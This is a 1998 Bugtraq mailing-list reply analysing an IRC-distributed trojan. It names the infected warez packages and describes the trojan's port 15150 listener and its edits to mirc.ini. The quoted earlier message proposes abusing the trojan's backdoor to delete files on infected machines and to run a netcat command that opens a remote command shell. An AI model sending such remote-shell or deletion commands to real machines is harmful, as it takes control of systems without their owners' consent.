[8117] in bugtraq
Re: Internet Wide DOS Attack using IRC
daemon@ATHENA.MIT.EDU (Samuel Cossette)
Sat Oct 3 15:10:02 1998
Date: Sat, 3 Oct 1998 14:41:54 -0400
Reply-To: Samuel Cossette <cluster@VIDEOTRON.CA>
From: Samuel Cossette <cluster@VIDEOTRON.CA>
X-To: George Imburgia <gti@HOPI.DTCC.EDU>
To: BUGTRAQ@NETSPACE.ORG
It's not the DO command of mirc, it's a buildin command, it's the equivalent
of /QUOTE or /RAW in a irc client, this is send the data directly to the
server
At this time I have found 2 directly file infected:
Packet Handler Firewall and FlashFXP v1.0, both distributed on a XDCC bot on
#warez950-dcc. In a zip file with some fake .nfo and a SETUP.EXE (oce.exe)
of 354k. quicktools.ocx (EZFTP OLE Control Module), Mswinsck.ocx are also
included.
Another interesting thing, the server open the port 15150, this is prompt:
Enter your username:, probably a FTPD
The trojan can also modify you mirc.ini, this is add auto-op, and modify
your current script.
>
>With the DO command enabled, they gave us the means to remotely disable
>this trojan.
>
>Something to the effect of;
>
>msg <nick> .do del c:\windows\system\oce*.*
>
>Then, msg <nick> .do <some evil command to lock up the machine, forcing a
>reboot>.
>
...
>
>The mIRC DO command is very powerful, and can be used to install netcat on
>the remote machine. We could then .msg <nick> <path to netcat>\nc.exe -L
>-p <any port> <your ip> -t -e command.com, giving a remote command prompt
>to investigate/disinfect the machine.
>
>
>___________________________________________________________________________
___
>George Imburgia e-mail:
gti@hopi.dtcc.edu
>Systems Administrator Phone: (302)739-4068
>Delaware Technical & Community College Fax: (302)739-3345
>Office of the President Pager: (302)741-5962
Samuel Cossette
cluster@videotron.ca
